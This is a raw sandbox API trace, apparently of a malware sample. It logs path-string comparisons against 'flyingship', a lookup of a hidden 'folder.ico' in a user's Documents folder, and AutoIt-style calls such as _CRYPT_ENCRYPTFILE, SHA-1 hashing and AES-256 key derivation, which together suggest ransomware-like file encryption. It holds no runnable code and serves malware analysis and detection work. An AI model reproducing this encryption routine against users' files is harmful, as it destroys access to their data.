HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="apes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rivate\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ivate\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vate\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ate\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="te\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="older.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.063] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0174.063] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0174.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ico", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0174.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="folder.ico", cAlternateFileName="")) returned 0x90ae18 [0174.063] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0174.063] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0174.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0174.063] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0174.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0174.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.064] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0174.065] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0174.105] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0174.105] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0174.105] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0174.105] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0174.105] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0174.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.105] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0174.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.105] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0174.106] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0174.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.106] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0174.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.106] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0174.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.106] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0174.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0174.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0174.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0174.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0174.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0174.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0174.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0174.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0174.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0174.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0174.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0174.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0174.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0174.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0174.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0174.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0174.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0174.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0174.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0174.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 